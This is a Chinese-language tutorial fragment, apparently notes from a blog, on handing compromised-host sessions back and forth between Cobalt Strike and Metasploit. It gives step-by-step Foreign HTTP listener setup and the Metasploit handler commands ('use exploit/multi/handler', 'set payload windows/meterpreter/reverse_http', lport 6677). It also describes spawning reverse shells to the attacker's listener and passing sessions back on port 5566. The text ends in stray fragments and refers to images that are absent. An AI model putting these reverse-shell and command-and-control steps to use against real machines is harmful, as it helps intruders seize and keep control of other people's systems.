
拿到才行,拿不到就是多余的
案例一MSF&CobaltStrike 联动 Shell
有一些功能可能cs或者msf强大一些,他们两个可以相互调用,在真实情况下也是可以cs和msf同时启动的,
cs移交给msf
.创建Foreign监听器
"Listeners""Add","Name"填"msf"(可随便填),"Payload"选"Foreign HTTP","HTTP Host(Stager)"填msf的IP地址,"HTTP Port(Stager)"端口自己设定

协议不够的时候可以添加插件,

2.MSF监听模块设置对应地址端口
选择监听模块
use exploit/multi/handler
设置payload,注意与CS保持一致
set payload windows/meterpreter/reverse_http
设置地址端口,其中地址可以不设或为0.0.0.0,意为任意地址,或者设为msf的IP地址(与CS保持一致);端口一定要保持一致
set lhost 0.0.0.0
set lport 6677
检查设置
show options
执行
exploit

3.CS执行Spawn选择监听器
选择需要反弹shell的电脑,右键"Spawn",选择刚才生成的监听器
稍等可在MSF上看见反弹结果,如果没有请检查网络

然后选择自己想反弹的主机的shell。

会话就弹出来了
msf移交给cs
CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线

我们的目的就是反弹到cs刚刚生成的监听器,我们要返回s4,就是那个5566端口的
进入相关模块,设置对应的东西,ip,端口,s4等等

ip设置为刚刚cs的ip监听的端口就可以了,运行,cs等待上线

就完成了上线
ping
an